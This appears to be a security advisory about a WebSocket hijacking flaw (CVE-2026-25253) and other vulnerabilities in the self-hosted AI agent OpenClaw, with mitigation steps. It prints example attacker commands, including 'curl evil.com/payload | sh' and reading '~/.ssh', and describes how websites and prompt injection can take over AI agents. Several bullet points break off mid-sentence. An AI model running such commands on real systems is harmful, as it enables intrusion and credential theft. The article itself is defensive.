TL;DR
OpenClaw, the open-source AI agent that shipped with the lobster mascot, hit 135,000 machines in five months. Then a security audit found 512 vulnerabilities, eight of them critical. One of them — CVE-2026-25253 — let any website you visited silently take control of your local agent. By the time the patches landed, the project's creator had left for OpenAI and pushed the codebase into an open-source foundation.
If you ran OpenClaw on a public IP at any point in early 2026, assume you were scanned.
What CVE-2026-25253 actually does
OpenClaw exposes a local WebSocket server so its browser dashboard can talk to
the agent. In versions before 2026.2.10, that server didn't validate the
Origin header on incoming WebSocket connections.
The attack:
1. You install OpenClaw. It listens on localhost:8765.
2. You browse to a malicious site (or a compromised ad network).
3. JavaScript on that site opens ws://localhost:8765/.
4. The agent accepts the connection, no auth.
5. The site sends commands. The agent runs them with your user permissions.
In practice that means anything from ls ~/.ssh to curl evil.com/payload | sh.
And because the agent has tool execution enabled by default, the attacker
doesn't need a separate exploit chain.
Why it landed so hard
A few things lined up:
- No auth by default. The dashboard was designed to be friction-free.
- Tool execution on by default. Sandbox mode was a config flag, not a default.
- Self-hosters skipped reverse proxies. Many ran the dashboard directly on
- Update cadence was brutal. OpenClaw shipped 13 patch versions in March 2026
A scan that ran in late January found about 1,000 publicly accessible OpenClaw installs with no authentication. The actual number behind home routers is unknowable but almost certainly larger.
Other vulnerabilities worth knowing
The audit flagged 512 issues. Most are low severity. The ones to actually care about:
- Prompt injection in tool descriptions — a malicious tool description in a
- Path traversal in the file tool — relative paths weren't normalized,
- Stored credentials in plaintext — API keys for AI providers were stored in
- Race condition in approval flow — fast clicks could approve a tool call
What to do right now
If you're running OpenClaw:
1. Update. The 2026.4 line has Origin validation, sandbox-by-default, and encrypted credential storage. Yes, you'll have to redo some config. 2. Stop exposing port 8765. If you need remote access, put it behind Tailscale or an SSH tunnel. Don't rely on auth alone. 3. Rotate every API key you stored in OpenClaw before March 2026. Treat them as compromised. 4. Review your shell history. If you ran an agent that browsed the web, look for any commands you don't recognize. They might not be yours.
If you don't have to run OpenClaw specifically, this is a reasonable moment to look at sandboxed alternatives — Hermes Agent runs in Docker by default, NanoClaw uses Apple containers on macOS, and ZeroClaw runs entirely offline. We compare them in the [next guide](/guides/openclaw-alternatives-2026).
Why this matters for the wider self-hosted AI space
OpenClaw's story is the story of every "weekend project that became infrastructure": the threat model lagged the install base by an order of magnitude. The fix isn't to abandon self-hosted agents — it's to treat them like any other long-running process with shell access. Default-deny network exposure. Sandbox tool execution. Rotate credentials. Update or stop running.
The crisis is real, but the post-crisis stack is more honest than what came before. The next year of self-hosted AI is going to be slower, more boring, and significantly less likely to wreck someone's laptop.
That's a good thing.